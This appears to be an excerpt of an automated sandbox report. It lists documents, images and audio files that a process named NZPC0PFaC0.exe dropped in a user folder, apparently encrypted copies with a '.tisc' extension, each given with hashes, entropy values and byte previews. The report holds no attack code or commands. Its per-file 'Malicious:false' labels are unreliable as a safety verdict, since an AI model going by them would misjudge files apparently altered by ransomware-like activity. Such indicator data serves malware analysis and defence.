                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.849725500908567
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:wlSB3wbWLoiIM5R4SxQqJzPUAJoPcWvaWlmti2wrfmYEaS79igbD:bAPiIM5RbxQqJzPxecWvdlm0fmYmtD
                                                                                    MD5:C7E879AF05B59E19EA66397EACA1E007
                                                                                    SHA1:35DEE43FF23FFB82390E2295B9D106E5C9A69EC6
                                                                                    SHA-256:525BA4AB5EF23E0F3A23AB577F23C9008FD5310E49715F219ADB9464B88FE4D7
                                                                                    SHA-512:1CB97684E89E733DF94B1A0B524EA1B48FC8CAB5E9BF6B6D114BEE80CC6D2B59C3BAD38E2AE1AF8A4D053225FB59FFF570FEB5A61A2BF81D3269524B4DA71829
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: B.^..{kl.Q..5....F7j..\i..f3n..wkA@.(..#.......l.$.........)...c...BP$..x.3.G.$e..Y.MC.w.....n..x.|.........Q..1..%8..+.....]../..F..rys.$i..8..2.5O..!...@I. ..Y"g].R.I=R....'.........^.......V.w|...o.O.p...>.g.!...n...W.Xh.0.,n..F.@....*>.W.KYm....$..R.........b..tN.....!..y.k...`..W.u.3hr.O.].r....!|.b.<.....^.....G.Xo.7.6N........).Y.........H.iz...a...$!b.P..3S.}1/.-Ta.....ZJsj.p......T&5N<.-o....a..m.F\....W.K&I@.KM;Dz..E9...~i....4].Z....=.....y.....N.En.\...Z.GF...e"8Z..$0.,..Zl;.L...N.k.......].g........A..._g4.....9....mI.-,.i..%@...LJs.M{..)X.....(#.O. .. .}i(;$.._/........G.%.+.J....Q..H.,V.\.e.........l}P.o#l....r...Qv....G..H....?.k.8..do~..v...th.oa.|b...u|...s.........)...V/_......b...^J...l..X...G*n..._.X..qA.....x#.......bu.....Ud:..4G..%V..?F.bI.l/|.@$Yc'...g......O..5..u{...B..7.@.t.l*......9i.S.~d,iD..5.fr..>..T.>......M...C.^X..j..2.V.?.m$}..D........_j. b...H.....;*1m.a.I.CDM...t.#@>..J....x.`.~.
                                                                                    C:\Users\user\Documents\QCFWYSKMHA.docx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.826016366757798
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:GElrSI02SxBmilzChopuQl9+641uS3RjbeALmX7agbD:55SLNzzCh0pav1uS3durXD
                                                                                    MD5:2FF2E3B5D15FD10578EDC479CB459AF4
                                                                                    SHA1:45CB4C5216D696435D2999425E29DE4AE6F14533
                                                                                    SHA-256:C2DAE22A1917B37C0A0898F372BDBAF3E5D072AD3A500AB5D97E994B6C45BC29
                                                                                    SHA-512:709DD5AEB3C58E13E39B061C01C7C5038D29A98C1A76EB050F331CD55FBA8C93A1FB1342E0DC7CFD47C1D387D1E7DF4241FD3CC942B38F1573CF005FB5048580
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ,....p.}....<....T.w.3|J&.....:C.q..%E.....s..#..].2....`2R...H....n.]..Y...-....,u.$vLc..jj..'o2%.7...0...f.</W.X.9...59n.Zh..?F....:..fx...(Z44..A.=...S.!.T.. M....h.7.q.;...$K...d...j..KW/..9.(..m.s.5..b..(<.2...YMg[.`..!.<.ip..(.........s4U}.........s.e..[..N..U]U.oc.Lm*.[..?....UfN3..F.7...8......'...j.e.!../..xu.....$8.\...1.5.=f...B..k....}&X.....[..].y.n0S......../.+.=}p.a.b.S\..........\6...r.}..1..#.e.6B,.T6./.....K4.(TS....o... .L}RG.F..w...*.*.b.H..E....f.. ..`r....N._$..w.o.'.c....6.....8...1..^@...j..d.C.~I.N.....bJ...\.6A.o..LV[A]..m..._....w......ed.n>..q."_M.6l.ZA5....M...@..=..il.n.,...9II..&.E@..Z'...Z....N.....?...d..|.Bk........q&.X .9~._(.....q.....<E...Y...f%.lp"X28.........v.vc.Q...f...3Y..s4eh.w6.&.`..y.?m..Z^..S$.\.r....G.[u.......v.@s.C..eu.S...1..R3U..G|e....'...?tt.m;...>5..a.....w.AF..........'.#W....B'.st..Q......J[.;..F.Q.....[?.V.'4..d4_ifLs#pJP...z.Z.!qit,.h.g.p..F...a....wH..nYJ../>..r..8...f]_...3.[
                                                                                    C:\Users\user\Documents\QCFWYSKMHA.docx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.826016366757798
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:GElrSI02SxBmilzChopuQl9+641uS3RjbeALmX7agbD:55SLNzzCh0pav1uS3durXD
                                                                                    MD5:2FF2E3B5D15FD10578EDC479CB459AF4
                                                                                    SHA1:45CB4C5216D696435D2999425E29DE4AE6F14533
                                                                                    SHA-256:C2DAE22A1917B37C0A0898F372BDBAF3E5D072AD3A500AB5D97E994B6C45BC29
                                                                                    SHA-512:709DD5AEB3C58E13E39B061C01C7C5038D29A98C1A76EB050F331CD55FBA8C93A1FB1342E0DC7CFD47C1D387D1E7DF4241FD3CC942B38F1573CF005FB5048580
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ,....p.}....<....T.w.3|J&.....:C.q..%E.....s..#..].2....`2R...H....n.]..Y...-....,u.$vLc..jj..'o2%.7...0...f.</W.X.9...59n.Zh..?F....:..fx...(Z44..A.=...S.!.T.. M....h.7.q.;...$K...d...j..KW/..9.(..m.s.5..b..(<.2...YMg[.`..!.<.ip..(.........s4U}.........s.e..[..N..U]U.oc.Lm*.[..?....UfN3..F.7...8......'...j.e.!../..xu.....$8.\...1.5.=f...B..k....}&X.....[..].y.n0S......../.+.=}p.a.b.S\..........\6...r.}..1..#.e.6B,.T6./.....K4.(TS....o... .L}RG.F..w...*.*.b.H..E....f.. ..`r....N._$..w.o.'.c....6.....8...1..^@...j..d.C.~I.N.....bJ...\.6A.o..LV[A]..m..._....w......ed.n>..q."_M.6l.ZA5....M...@..=..il.n.,...9II..&.E@..Z'...Z....N.....?...d..|.Bk........q&.X .9~._(.....q.....<E...Y...f%.lp"X28.........v.vc.Q...f...3Y..s4eh.w6.&.`..y.?m..Z^..S$.\.r....G.[u.......v.@s.C..eu.S...1..R3U..G|e....'...?tt.m;...>5..a.....w.AF..........'.#W....B'.st..Q......J[.;..F.Q.....[?.V.'4..d4_ifLs#pJP...z.Z.!qit,.h.g.p..F...a....wH..nYJ../>..r..8...f]_...3.[
                                                                                    C:\Users\user\Documents\QCFWYSKMHA.xlsx
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.854036739782813
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:3ZGcl7W6qYXcrcOLPq/wXczKXDjsDvP6xZNBU/d3CPPA7hoIQYIPlIIBSm8oq3sw:pGc06xQ7LFUojsDyFWiov7oQT3TD
                                                                                    MD5:9B5A125B8A56737B380BA889A13CF25C
                                                                                    SHA1:5AFF943EA132FBDC150ACC65886CCA1F40BEF225
                                                                                    SHA-256:FFA2B0BCBDB9601831628A87D14D1C4510D392C57B9EBB9E76798CB4E9C786BA
                                                                                    SHA-512:FE2D83A5D4D915723FF2F81E3E73EDA943A622998677625B7D8299552F4D1A396E412DD3542C28F3C89FE226F9505074304466BEFFEC9F0E60C017B50F8077FB
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .9.*E.....|%wb.2..Tg...jb.3[e.......K.}..u~....6.R..8(-..T ..]d..... ..q.?.G..........S..<x.,...[.%d4..7..uK.B3.w..B..n...o.......r...F...3.Y.n.u....I?kJ.\.`..A#i...H.......*.]........d....U.]..h.......L.w...4m8.......Y..LC....}.NR.>^.&.`..(...azO^5]....//..mvj^J|......V.B...|...\X\l.B.V/.>.zaHf...&.$...gM........u,.FV.X..q...Nu.........V..|.6.P.$..........~/.q..m...x+Y.!...U.#...".5.Gj......t`...2..lF....'.rI...J9../.&.K.K-.05.g../...q..p.].;.y+>X.r..H{..Qa...."Zj..q....)..G..e..(...7.T.....*u.......L3W......@...6.+q..u.......4C..yAy... +?Ec.....P"{O...sq......4..K...}3.....-[.]..9i...C[)...5... ....O.(.......u.G..H2.........p.h.n=]...D.&X{..s7bR.9g.&.o...R.k}>..<..MO..$.b.9\.r.....&....f....6...`......n.D.R8.I0.$.-.......'[.......ygX...$....^UA...Gf.)p.!............!Ux...&.Z+...t.5.f.[-D...+cQ....Nj.{f.....L,W8.....E.........a.....=..o.'.u......`..9lj:N.q./...f..]._.C1.4.YF.-.......Wq...W.k...B..!9.n.Q..|....jc...y..........`.y.
                                                                                    C:\Users\user\Documents\QCFWYSKMHA.xlsx.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.854036739782813
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:3ZGcl7W6qYXcrcOLPq/wXczKXDjsDvP6xZNBU/d3CPPA7hoIQYIPlIIBSm8oq3sw:pGc06xQ7LFUojsDyFWiov7oQT3TD
                                                                                    MD5:9B5A125B8A56737B380BA889A13CF25C
                                                                                    SHA1:5AFF943EA132FBDC150ACC65886CCA1F40BEF225
                                                                                    SHA-256:FFA2B0BCBDB9601831628A87D14D1C4510D392C57B9EBB9E76798CB4E9C786BA
                                                                                    SHA-512:FE2D83A5D4D915723FF2F81E3E73EDA943A622998677625B7D8299552F4D1A396E412DD3542C28F3C89FE226F9505074304466BEFFEC9F0E60C017B50F8077FB
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .9.*E.....|%wb.2..Tg...jb.3[e.......K.}..u~....6.R..8(-..T ..]d..... ..q.?.G..........S..<x.,...[.%d4..7..uK.B3.w..B..n...o.......r...F...3.Y.n.u....I?kJ.\.`..A#i...H.......*.]........d....U.]..h.......L.w...4m8.......Y..LC....}.NR.>^.&.`..(...azO^5]....//..mvj^J|......V.B...|...\X\l.B.V/.>.zaHf...&.$...gM........u,.FV.X..q...Nu.........V..|.6.P.$..........~/.q..m...x+Y.!...U.#...".5.Gj......t`...2..lF....'.rI...J9../.&.K.K-.05.g../...q..p.].;.y+>X.r..H{..Qa...."Zj..q....)..G..e..(...7.T.....*u.......L3W......@...6.+q..u.......4C..yAy... +?Ec.....P"{O...sq......4..K...}3.....-[.]..9i...C[)...5... ....O.(.......u.G..H2.........p.h.n=]...D.&X{..s7bR.9g.&.o...R.k}>..<..MO..$.b.9\.r.....&....f....6...`......n.D.R8.I0.$.-.......'[.......ygX...$....^UA...Gf.)p.!............!Ux...&.Z+...t.5.f.[-D...+cQ....Nj.{f.....L,W8.....E.........a.....=..o.'.u......`..9lj:N.q./...f..]._.C1.4.YF.-.......Wq...W.k...B..!9.n.Q..|....jc...y..........`.y.
                                                                                    C:\Users\user\Documents\QCFWYSKMHA\BJZFPPWAPT.mp3
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.849980378540775
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:XXhw3mI/pR9p0ArP1d9CLbPMBla/SA8vj/6XIa831qY0u1gTOnBFCpfN8g5YgbD:XRwp/nfP1/CL7MBJN00B0unARD
                                                                                    MD5:250DB6B76D758286E425C4166B9EF480
                                                                                    SHA1:C1F5FA6ADF9BACBC3152700C2DB377ACB5AE59C7
                                                                                    SHA-256:CA1B805F5230EBBD8CCE27B2CE306007B013ECAF0B71E6A087B8CB04044C9EA0
                                                                                    SHA-512:CF843B7E1F61437A89B7D7147A1C9808B9FC656604CDCC2BD3BE76421E8307C8FF29FF532858BEB524CE0BB7658ECD107DF0794ECC52DA18EEAB53BF35CEF77E
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ....]....f.{.....8.d...KJ..]....>e..e....s..r.z...!..Y;....`...u...<..d..v..~..^.^A....o..h.%~Z`.]...3.s.....pc..$..-7...y5......a.q.X}].565KZ1...UF.0V..!...*~.ag...-.RC.^.....`T.d.A....D...`..W#.B.S4"A`.zI.._..jo6.........m..qJ.-=s..........5...6..C.."....e.K..S.#.|.Z$.. ..L..^I.........u......ab.P..|F...s.{.-......{.?..E/..d.......M..|.....W.~....&g....!..7.GA.;..{...D..j....N............z...~%&...J........]...7.......m.\...Y....L.......8.._,...&...7...8.../..EG.R).*..ooD....{..-....~........P..ymf.dRt.9.......T.....|((.2.&R...On..Y./..i.u.u..C....J..#./.....J.t...T.YH.I9.8..w.]. }.E....u3..uW.x...Hz.[!#.0t...'Q...?Zeg=...,_..6t..=.W...f..P_..pp..._.UP.#;.|v.*.SG.._.......]....#..z......V..2.<...BR.x$...`.h.y.z.=...<..H...*..[."....G...|d....y..Y.6W.1.K.vv`<...WD.hB..rO|.......:.]...^"y.......a.q.r....@...$.^.....a..n..]w..0..9..l-H..#.}Z...............@.s....Um.R..w.FE.......m..t..h. ~.wl..lf...'.tX.Zd......h7...;....x.=.^.c...
                                                                                    C:\Users\user\Documents\QCFWYSKMHA\BJZFPPWAPT.mp3.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.849980378540775
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:XXhw3mI/pR9p0ArP1d9CLbPMBla/SA8vj/6XIa831qY0u1gTOnBFCpfN8g5YgbD:XRwp/nfP1/CL7MBJN00B0unARD
                                                                                    MD5:250DB6B76D758286E425C4166B9EF480
                                                                                    SHA1:C1F5FA6ADF9BACBC3152700C2DB377ACB5AE59C7
                                                                                    SHA-256:CA1B805F5230EBBD8CCE27B2CE306007B013ECAF0B71E6A087B8CB04044C9EA0
                                                                                    SHA-512:CF843B7E1F61437A89B7D7147A1C9808B9FC656604CDCC2BD3BE76421E8307C8FF29FF532858BEB524CE0BB7658ECD107DF0794ECC52DA18EEAB53BF35CEF77E
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: ....]....f.{.....8.d...KJ..]....>e..e....s..r.z...!..Y;....`...u...<..d..v..~..^.^A....o..h.%~Z`.]...3.s.....pc..$..-7...y5......a.q.X}].565KZ1...UF.0V..!...*~.ag...-.RC.^.....`T.d.A....D...`..W#.B.S4"A`.zI.._..jo6.........m..qJ.-=s..........5...6..C.."....e.K..S.#.|.Z$.. ..L..^I.........u......ab.P..|F...s.{.-......{.?..E/..d.......M..|.....W.~....&g....!..7.GA.;..{...D..j....N............z...~%&...J........]...7.......m.\...Y....L.......8.._,...&...7...8.../..EG.R).*..ooD....{..-....~........P..ymf.dRt.9.......T.....|((.2.&R...On..Y./..i.u.u..C....J..#./.....J.t...T.YH.I9.8..w.]. }.E....u3..uW.x...Hz.[!#.0t...'Q...?Zeg=...,_..6t..=.W...f..P_..pp..._.UP.#;.|v.*.SG.._.......]....#..z......V..2.<...BR.x$...`.h.y.z.=...<..H...*..[."....G...|d....y..Y.6W.1.K.vv`<...WD.hB..rO|.......:.]...^"y.......a.q.r....@...$.^.....a..n..]w..0..9..l-H..#.}Z...............@.s....Um.R..w.FE.......m..t..h. ~.wl..lf...'.tX.Zd......h7...;....x.=.^.c...
                                                                                    C:\Users\user\Documents\QCFWYSKMHA\BNAGMGSPLO.pdf
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.829319622841176
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:1526mlbikwQVkrCBxngHNLxdostvQqTiIG9evvdZ4Vg28i5gYZzfjEkZFiDd4gbD:152nGkw7rC7ngHXtot9uvdZ+g2ngYZ/8
                                                                                    MD5:AF5015584C37C64CFF4641D13F419629
                                                                                    SHA1:E0A748F6C45DCFAE195647D3341258A73B6F3AD3
                                                                                    SHA-256:5B3CE4909A591E4E50382FBA720F0B7094496597BDA8B2CA2269B0984093767F
                                                                                    SHA-512:FC227643679022CF1086BFB8D76B2BAC9643E2FAEE0D9F0ED10F3FA7B50180132E87EE55791AC0DE317CB1490775B5029A40DEF12F0FF7D908B4F043CF9DAF73
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .G..#...h.u....D...H2....ZQ.X...e...z.`s...5..:..@. .-L...U....l.FW.....fp..&.z{.e.3..N.+...cj.25}....bU...?...,...GQ}...$...,vI...28.....f..(..52+~....O..'.{..fr..[..t...7....`.E...!.kE..V..Bo..=....h.q.C..!.+h.....Vp..M.k....6..f.0zo.%H.S.F..'..;f.*64.R_....1=.......Z.>..f...Lf.".....x...r....}..?..L 8G.y...1[........I.O.g.-t.-7.y.l.5......a_...,.)..s.....P.c....1H$E...M<...y.L.&.Y..F...{.......F.P.2.8.f.....t....j....t..*.M..zS.{..y..C.h.k..TM'C..}..jv..E}..K.f#'..:..y..(..1......rYJo..&......U.U........a.W.4D..O.c...Y>.R(+mRgb#$..<.Y./._....io..f.....W#..)..r5k.A.~..b..+....Y.|.....p.+....9.)rH.n}..>8H$f[....~z`M}0..."+A...X|.4K!'...K.. K.iJ.jF.@Q...:..nsM..IQ.I..&..w2...r ...ZfI:..I(`}0..*{2.u..}).lJaI.....<.. ......W.X...4DYU..B...-...r.dp@55K.0A.2...*.]..'......L....:j.P;.._........o.z?.8..hG..-..#.n.....x.j...bN..1@....\..#...bD........3.xT..@%\%..Kl......#O..%......v........:j+......8%.uP.S6.r.O.&...W;9G.....D......3Y.Mj..$
                                                                                    C:\Users\user\Documents\QCFWYSKMHA\BNAGMGSPLO.pdf.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.829319622841176
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:1526mlbikwQVkrCBxngHNLxdostvQqTiIG9evvdZ4Vg28i5gYZzfjEkZFiDd4gbD:152nGkw7rC7ngHXtot9uvdZ+g2ngYZ/8
                                                                                    MD5:AF5015584C37C64CFF4641D13F419629
                                                                                    SHA1:E0A748F6C45DCFAE195647D3341258A73B6F3AD3
                                                                                    SHA-256:5B3CE4909A591E4E50382FBA720F0B7094496597BDA8B2CA2269B0984093767F
                                                                                    SHA-512:FC227643679022CF1086BFB8D76B2BAC9643E2FAEE0D9F0ED10F3FA7B50180132E87EE55791AC0DE317CB1490775B5029A40DEF12F0FF7D908B4F043CF9DAF73
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: .G..#...h.u....D...H2....ZQ.X...e...z.`s...5..:..@. .-L...U....l.FW.....fp..&.z{.e.3..N.+...cj.25}....bU...?...,...GQ}...$...,vI...28.....f..(..52+~....O..'.{..fr..[..t...7....`.E...!.kE..V..Bo..=....h.q.C..!.+h.....Vp..M.k....6..f.0zo.%H.S.F..'..;f.*64.R_....1=.......Z.>..f...Lf.".....x...r....}..?..L 8G.y...1[........I.O.g.-t.-7.y.l.5......a_...,.)..s.....P.c....1H$E...M<...y.L.&.Y..F...{.......F.P.2.8.f.....t....j....t..*.M..zS.{..y..C.h.k..TM'C..}..jv..E}..K.f#'..:..y..(..1......rYJo..&......U.U........a.W.4D..O.c...Y>.R(+mRgb#$..<.Y./._....io..f.....W#..)..r5k.A.~..b..+....Y.|.....p.+....9.)rH.n}..>8H$f[....~z`M}0..."+A...X|.4K!'...K.. K.iJ.jF.@Q...:..nsM..IQ.I..&..w2...r ...ZfI:..I(`}0..*{2.u..}).lJaI.....<.. ......W.X...4DYU..B...-...r.dp@55K.0A.2...*.]..'......L....:j.P;.._........o.z?.8..hG..-..#.n.....x.j...bN..1@....\..#...bD........3.xT..@%\%..Kl......#O..%......v........:j+......8%.uP.S6.r.O.&...W;9G.....D......3Y.Mj..$
                                                                                    C:\Users\user\Documents\QCFWYSKMHA\EEGWXUHVUG.jpg
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.880188784932163
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:QO8BhoV7kgOH0uIjaSHTVlL4jvLJCoAJGI0S+BxCjr5sYVIEIea1dNETgbD:b8BE7bw0uEjgJCoEGI0PxCX5TVIy4D
                                                                                    MD5:C05F87A8743E8182DC3A9517138CA834
                                                                                    SHA1:4CC7C9C176DD3BB30B6CCBCD4EE5D1B7B18F2EB1
                                                                                    SHA-256:88FB3E277FD99B80EFA904A8B2E66C77A19332B27B9951483453E10BA0880E23
                                                                                    SHA-512:58FF2DE3E107B1D9723BF1AD18DBABAF876548726ADC88EBEBE73BF8DC8DA7792F61D42FBD1D2C38CC71D8F15E77DCBEF79AD114A6C177CE5CC08531A265F4B8
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: Z..k......v .(....|....TY).XLP.r.....)...u2..>g......e....t .@...K..6.c..l.+r.W\..t..SW..{...Y../.....Nh<d2K^H.b..re.(.L.C.+...R...#...Ez.C......g...q..E3Pi.....]....o..=.......n..%T..b...........l-....!.....H/....*x.z2[.........-.H...O....#.Zt..=../D...`...H...D".ot.H...L)2'r...0:.^.-..v].......Q.S.......h..^".v.X.l....8..w....Fg...].........h3.....\4.}q.".U....~.c..:6..P=8.q..$P..t...?F=.H>.....q...Y.x..4#_...,.p.....u.5&[.?...U3.u.{.[Ih..j.t....X}Z`i....'...q..<I.hk...\....Ku^..h........nD...Y..!..m[...b@t...s.)........|....&.e<...d..G.z_.y ..~...[g.{..M~.!T..!a.~...%%5P..bO..AXZ.....g....d...h>..k..0.'....[.{_1$....E...t..j.; ....'...*...a.. .sj.T.h.SRs..8..x0P...G.9.....O.CmjV.E.I|...x............4.%/cx}...l.W../owNG.bK.......:...(.*x5..#../..h...:....[...F.3.....Gr....'.`.)s..r....w.....x..F.k.....}...R.z....\.?...V..P..y=.<...Ws}......g.....O).h=E..T..:.a.......b...J.......Q1%N..?..`n....#..[.(g;..:T...>..C.-_HV..f.T.P...tp!4...
                                                                                    C:\Users\user\Documents\QCFWYSKMHA\EEGWXUHVUG.jpg.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.880188784932163
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:QO8BhoV7kgOH0uIjaSHTVlL4jvLJCoAJGI0S+BxCjr5sYVIEIea1dNETgbD:b8BE7bw0uEjgJCoEGI0PxCX5TVIy4D
                                                                                    MD5:C05F87A8743E8182DC3A9517138CA834
                                                                                    SHA1:4CC7C9C176DD3BB30B6CCBCD4EE5D1B7B18F2EB1
                                                                                    SHA-256:88FB3E277FD99B80EFA904A8B2E66C77A19332B27B9951483453E10BA0880E23
                                                                                    SHA-512:58FF2DE3E107B1D9723BF1AD18DBABAF876548726ADC88EBEBE73BF8DC8DA7792F61D42FBD1D2C38CC71D8F15E77DCBEF79AD114A6C177CE5CC08531A265F4B8
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: Z..k......v .(....|....TY).XLP.r.....)...u2..>g......e....t .@...K..6.c..l.+r.W\..t..SW..{...Y../.....Nh<d2K^H.b..re.(.L.C.+...R...#...Ez.C......g...q..E3Pi.....]....o..=.......n..%T..b...........l-....!.....H/....*x.z2[.........-.H...O....#.Zt..=../D...`...H...D".ot.H...L)2'r...0:.^.-..v].......Q.S.......h..^".v.X.l....8..w....Fg...].........h3.....\4.}q.".U....~.c..:6..P=8.q..$P..t...?F=.H>.....q...Y.x..4#_...,.p.....u.5&[.?...U3.u.{.[Ih..j.t....X}Z`i....'...q..<I.hk...\....Ku^..h........nD...Y..!..m[...b@t...s.)........|....&.e<...d..G.z_.y ..~...[g.{..M~.!T..!a.~...%%5P..bO..AXZ.....g....d...h>..k..0.'....[.{_1$....E...t..j.; ....'...*...a.. .sj.T.h.SRs..8..x0P...G.9.....O.CmjV.E.I|...x............4.%/cx}...l.W../owNG.bK.......:...(.*x5..#../..h...:....[...F.3.....Gr....'.`.)s..r....w.....x..F.k.....}...R.z....\.?...V..P..y=.<...Ws}......g.....O).h=E..T..:.a.......b...J.......Q1%N..?..`n....#..[.(g;..:T...>..C.-_HV..f.T.P...tp!4...
                                                                                    C:\Users\user\Documents\QCFWYSKMHA\EFOYFBOLXA.png
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.8397694283608885
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:bNoS11pd0I5udC5Qa6FYZKFxIuMVwfL0MyM79n6seBEaShqqp+BBAq9gYKgbD:bNoK1MIE8xlsjUVwfLv9n615SgNjPgAD
                                                                                    MD5:B8CBA69A65A7895E97420770C858CEA9
                                                                                    SHA1:CA70A784996E4CDC50EF337F2F8AF9CB8CBDB55A
                                                                                    SHA-256:50BD2513E5E639F079ED7D3AFC88743B2B6D89C2C38350BD52F917A231A1729E
                                                                                    SHA-512:1C6F7309E6DFF04FAF3AFC54A9E0B229057E166B7448AE0AA93EC8738D2780EF4ADBF5DCCA6E0BD3E8E36F2432E0C7D3553241505F19CAC537C8922DE0257150
                                                                                    Malicious:false
                                                                                    Reputation:unknown
                                                                                    Preview: dpPv..si.!.....Mp@.2t..#,."....I....V.H.w*...(..v...t..Q.A..5....u./...4.......i..D.t.,.d.;CS....sM..A..3.g.0.%&yV.b8.C..$...,.2...A........$.yh._.Z..]......o...O.w.L,....g..2 ..P..5..[9.7k...t.xz.C..VA...K?..}...).P.......f.RB....z..o...Z.z2.c...i.;.r......%..W&.......d-..$`.T{.....kw..G..c..0.V~...%.{.".....2...y.1........<.-..oH1.7.$..{.-.a.A:....&......N.3UY.hqzqQ...^....=....$......A.44.<eM..~...a.... [b;.65U..HU....d...%.......!7.l6.$.....p->.@7\....|.W..._.^w.oRw....J..qM..E...i......Y.t$..A0 .....z....%0Uc.......;zD....H..3...y.Q.T.d].d...z..8..3...I'.Q.ime.(-.8.H$.).g....el........g......>^....$Z...H...-L..aJ..a*............._..H.#o...%.%.O....G.FO[....]1.Y[(.....w.......+.0iV.\..-.+....T....S.|.........u2..Boa.*.J..C...7Q....U...0....N.K^....*.$.Z...-...q.=..{....<2.Vs.I..v.,......%'....C.z}.|r........RQ.l1LRK...`....O!..C....(..o.4...?......k.-K~.^.7.......1W..w.t|............74O.....z1.G. ....z'.v....2A5.....Py...gke..x..j
                                                                                    C:\Users\user\Documents\QCFWYSKMHA\EFOYFBOLXA.png.tisc (copy)
                                                                                    Process:C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1355
                                                                                    Entropy (8bit):7.8397694283608885
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:bNoS11pd0I5udC5Qa6FYZKFxIuMVwfL0MyM79n6seBEaShqqp+BBAq9gYKgbD:bNoK1MIE8xlsjUVwfLv9n615SgNjPgAD
                                                                                    MD5:B8CBA69A65A7895E97420770C858CEA9
                                                                                    SHA1:CA70A784996E4CDC50EF337F2F8AF9CB8CBDB55A
                                                                                    SHA-256:50BD2513E5E639F079ED7D3AFC88743B2B6D89C2C38350BD52F917A231A1729E
                                                                                    SHA-512:1C6F7309E6DFF04FAF3AFC54A9E0B229057E166B7448AE0AA93EC8738D2780EF4ADBF5DCCA6E0BD3E8E36F2432E0C7D3553241505F19CAC537C8922DE0257150
                                                                                    Malicious:false
                                                                                    Reputation:unknown
